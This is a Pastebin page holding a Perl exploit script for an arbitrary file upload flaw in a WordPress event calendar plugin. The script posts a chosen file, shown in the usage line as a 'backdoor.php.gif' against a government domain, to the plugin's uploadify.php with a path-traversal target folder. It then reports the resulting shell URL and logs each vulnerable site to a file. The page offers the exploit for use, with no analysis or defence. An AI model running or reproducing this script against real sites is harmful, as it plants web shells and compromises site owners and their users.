Googleinurl

[EXPLOIT]Wordpress Plugin Calendar - AFU

Apr 2nd, 2015
1,985
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/perl
  2. #EXPLOIT: http://www.exploit4arab.net/exploits/1433
  3. use LWP::UserAgent;
  4. use strict;
  5. use warnings;
  6.  
  7. sub banner {
  8. print "[!] [ EXPLOIT NAME ]: Wordpress event Calendar Plugin - (AFU)Arbitrary File Upload / EDIT GoogleINURL\n";
  9. print "[!] [ usage ]:        perl $0 www.target.gov.br backdoor.php.gif\n";
  10. print "--------------------------------------------------------------------------------------------------------------------\n";
  11. }
  12. if (!defined ($ARGV[0] && $ARGV[1])) { banner(); exit; }
  13. my $target = $ARGV[0]; my $file = $ARGV[1];
  14. my $ua = LWP::UserAgent->new(agent => q{Mozilla/5.0 (Windows NT 6.3; WOW64) (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36},);
  15. my $ch = $ua->post("http://$target/wp-content/plugins/php-event-calendar/server/classes/uploadify.php", Content_Type => 'form-data', Content => [ 'Filedata' => [$file] , targetFolder => '../../../../../' , user_id => '0day' ])->content;
  16. if($ch =~/1/) {
  17. print "\n  [+] [ INFO ] SHELL:: http://$target/$file";
  18. print "\n  [+] [ INFO ] File Uploaded !\n";
  19. open(my $file_,">>","vuln.txt") || die("error $!");
  20. print $file_ "http://$target/$file\n";
  21. close($file_);
  22. } else { print "\n  [x] [ ERROR ]  Target not Vuln\n"; }
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×